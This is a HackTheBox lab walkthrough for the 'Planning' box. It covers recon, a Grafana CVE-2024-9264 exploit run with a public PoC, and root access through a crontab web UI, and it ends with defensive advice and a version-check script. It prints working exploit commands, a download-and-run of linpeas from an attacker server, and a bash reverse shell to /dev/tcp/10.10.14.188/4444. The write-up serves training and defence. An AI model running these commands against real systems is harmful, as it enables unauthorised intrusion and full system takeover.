HTB Planning

Table of Contents
HackTheBox Easy Boxes - This article is part of a series.
Part : This Article

Overview

Planning is an Easy-rated Linux box from HackTheBox that involves exploiting a vulnerable Grafana instance and escalating privileges through a misconfigured cron job management interface. This walkthrough will guide you through each step of the penetration testing process.

Box Information

Name: Planning
Difficulty: Easy
IP Address: 10.10.11.68
Operating System: Linux (Ubuntu)
Initial Credentials: admin / 0D5oT70Fq13EvB5r

Reconnaissance

Initial Port Scan

Let’s start with a comprehensive nmap scan to identify open ports and running services:

nmap -sV -sC -A 10.10.11.68

Scan Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)

The scan reveals two open ports:

  • Port 22/tcp: SSH service (OpenSSH 9.6p1)
  • Port 80/tcp: HTTP service (nginx 1.24.0) redirecting to planning.htb

Host Configuration

Add the target hostname to your /etc/hosts file:

echo "10.10.11.68 planning.htb" >> /etc/hosts

Web Application Analysis

Visiting http://planning.htb reveals an Education Courses webpage with minimal functionality. The site appears to be static with no obvious attack vectors.

Subdomain Enumeration

Since the main site doesn’t offer much, let’s enumerate subdomains using ffuf:

ffuf -u http://planning.htb/ -w /usr/share/fuzzDicts/subdomainDicts/main.txt -H "Host:FUZZ.planning.htb" -fs 178

✅ Discovery: Found grafana.planning.htb subdomain

Update your /etc/hosts file:

echo "10.10.11.68 grafana.planning.htb" >> /etc/hosts

Initial Access

Grafana Discovery

Accessing http://grafana.planning.htb reveals a Grafana login interface. This is promising as Grafana has had several known vulnerabilities.

Authentication

Using the credentials provided in the box description:

  • Username: admin
  • Password: 0D5oT70Fq13EvB5r

The credentials successfully authenticate us into the Grafana instance.

Grafana Exploitation

With valid credentials, we can exploit the Grafana instance. For this box, the vulnerability is CVE-2024-9264: Grafana Post-Auth DuckDB SQL Injection (RCE, File Read).

Proof of Concept (PoC)

This PoC leverages the public exploit from nollium/CVE-2024-9264:

  • Install dependencies:

    pip install -r requirements.txt

  • File Read (works on all vulnerable versions):

    python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb

  • Command Execution (Grafana v11.0.0 only):

    python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'id' http://grafana.planning.htb

  • Arbitrary DuckDB query (e.g., get environment variable):

    python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -q "SELECT getenv('PATH')" http://grafana.planning.htb

The exploit works by creating a dashboard with an expression, intercepting the request, and modifying the datasource type from math to sql. The PoC script automates this process and allows file read or command execution depending on the Grafana version and server configuration.

ℹ️ Note: The specific exploit depends on the Grafana version; past Grafana vulnerabilities include path traversal, SQL injection, and authentication bypass. For CVE-2024-9264, the DuckDB binary must be present on the server for full exploitation.

SSH Access

The Grafana exploitation reveals credentials for user enzo. We can directly SSH into the system:

ssh enzo@planning.htb

✅ Achievement: Successfully obtained user.txt

Privilege Escalation

System Enumeration

Now that we have user access, let’s enumerate the system for privilege escalation paths. We’ll use LinPEAS for comprehensive enumeration.

Setup HTTP Server (Attacker Machine):

python3 -m http.server 8080

Download and Execute LinPEAS (Target Machine):

wget http://10.10.14.188:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Key Discoveries

Interesting Files

LinPEAS identifies several interesting findings, including a suspicious file at /opt/crontabs/crontab.db:

cat /opt/crontabs/crontab.db

This file contains additional credentials that might be useful for further exploitation.

Internal Services

The enumeration reveals an internal service running on port 8000 (localhost only). This suggests there’s a web application accessible only from within the system.

Port Forwarding

To access the internal service on port 8000, we’ll establish an SSH tunnel:

ssh -L 8000:localhost:8000 enzo@planning.htb

This command forwards our local port 8000 to the target’s localhost:8000.

Crontab Management Interface

Accessing http://localhost:8000 using the credentials found in the crontab database reveals a Crontab Management UI. This web interface allows users to create, modify, and execute scheduled tasks.

⚠️ Security Risk: A web interface for cron job management running with elevated privileges poses a significant security risk.

Root Access Exploitation

We can exploit this interface to execute commands with root privileges:

  1. Setup Netcat Listener (Attacker Machine):

    nc -lnvp 4444

  2. Create Malicious Cron Job:

    • Navigate to the Crontab UI
    • Click “New” to create a new cron job
    • Enter the following reverse shell command:

      bash -c 'exec bash -i &>/dev/tcp/10.10.14.188/4444 <&1'

    • Save the job

  3. Execute the Job:

    • Click “Run Now” to immediately execute the cron job
    • Check your netcat listener for the incoming connection

✅ Achievement: Root shell obtained! You can now access root.txt

Attack Summary

Attack Path Visualization

graph TD
    A[Initial Scan] --> B[Subdomain Enumeration]
    B --> C[Grafana Discovery]
    C --> D[Credential Authentication]
    D --> E[Grafana Exploitation]
    E --> F[SSH as enzo]
    F --> G[System Enumeration]
    G --> H[Internal Service Discovery]
    H --> I[Port Forwarding]
    I --> J[Crontab UI Access]
    J --> K[Malicious Cron Job]
    K --> L[Root Shell]

Key Vulnerabilities

  1. Weak Authentication: Default/weak credentials on Grafana
  2. Grafana Exploitation: Vulnerable Grafana version allowing code execution
  3. Insecure Cron Management: Web interface with elevated privileges
  4. Poor Access Controls: Internal services accessible via port forwarding

Security Recommendations

  • Change Default Credentials: Always change default passwords on administrative interfaces
  • Update Software: Keep Grafana and other services updated to latest versions
  • Limit Interface Access: Restrict access to management interfaces
  • Network Segmentation: Implement proper network controls to prevent lateral movement
  • Principle of Least Privilege: Avoid running services with unnecessary elevated privileges

Lessons Learned

This box demonstrates several common security misconfigurations:

  1. Default Credentials: The initial access was gained through provided credentials, highlighting the importance of changing default passwords
  2. Internal Service Security: Even internal services need proper security controls
  3. Privilege Management: Web interfaces should not run with root privileges without proper safeguards

Conclusion

Planning is an excellent beginner-friendly box that teaches fundamental penetration testing concepts including reconnaissance, web application exploitation, and privilege escalation. The attack path is straightforward but educational, demonstrating real-world misconfigurations commonly found in enterprise environments.

Flags

  • User Flag: /home/enzo/user.txt
  • Root Flag: /root/root.txt

ℹ️ Disclaimer: This writeup is for educational purposes only. Always ensure you have proper authorization before testing these techniques on any system.

🚨 CVE-2024-9264: Grafana SQL Expressions Remote Code Execution

  • Severity: Critical (CVSS 9.4)
  • Affected Product: Grafana v11.0.0 (and other 11.x versions)
  • Vulnerability: The experimental SQL Expressions feature allows insufficiently sanitized DuckDB queries, leading to command injection and local file inclusion. Any authenticated user (Viewer or higher) can exploit this if the duckdb binary is present in $PATH.
  • Exploit Impact:
    • Remote code execution (RCE) on Grafana v11.0.0
    • Arbitrary file read on all vulnerable versions
  • Patched Versions: 11.0.5+security-01, 11.1.6+security-01, 11.2.1+security-01, and later
  • Box Version: This box runs Grafana v11.0.0, which is fully exploitable for RCE and file read.
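The patched builds listed above are enough to write a fleet-side exposure check. This is an added example for this writeup (not code from Grafana, the box, or the exploit author): it parses Grafana version strings, compares them against the first fixed build of each affected 11.x line, and classifies exposure by whether a duckdb binary is on PATH, as the advisory summary describes. Treating 11.3 and later as unaffected is an assumption drawn from "and later".

```python
import re
import shutil
from typing import Optional, Tuple

# First fixed build per affected 11.x minor line (from the advisory summary):
# 11.0.5+security-01, 11.1.6+security-01, 11.2.1+security-01.
# Stored as minor -> (patch, security-suffix number).
FIXED_BUILDS = {0: (5, 1), 1: (6, 1), 2: (1, 1)}

VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:\+security-(\d+))?")


def parse_version(version: str) -> Optional[Tuple[int, int, int, int]]:
    """'v11.0.5+security-01' -> (11, 0, 5, 1); a missing +security suffix counts as 0."""
    m = VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, patch, sec = m.groups()
    return int(major), int(minor), int(patch), int(sec or 0)


def is_vulnerable(version: str) -> bool:
    """True when the version predates the fixed build of its 11.x minor line."""
    parsed = parse_version(version)
    if parsed is None:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch, sec = parsed
    if major != 11 or minor not in FIXED_BUILDS:
        # Outside the 11.0-11.2 lines named above. Assumption: 11.3+ shipped
        # after the fix ("and later" in the advisory summary).
        return False
    return (patch, sec) < FIXED_BUILDS[minor]


def assess(version: str, duckdb_on_path: bool) -> str:
    """Classify exposure the way the advisory summary describes it."""
    if not is_vulnerable(version):
        return "not-affected"
    if not duckdb_on_path:
        return "latent"  # vulnerable code, but no duckdb binary to drive it
    if parse_version(version)[:3] == (11, 0, 0):
        return "rce-and-file-read"  # command execution only on v11.0.0
    return "file-read"  # file read on every other vulnerable version


def assess_local(version: str) -> str:
    """Convenience wrapper for running on the Grafana host itself."""
    return assess(version, shutil.which("duckdb") is not None)
```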

I hope this was helpful
Author: Adonijah Kiplimo
Cybersecurity professional specializing in Network & Cloud Security, Digital Forensics, and Penetration Testing. Passionate about sharing knowledge and empowering others through hands-on security training.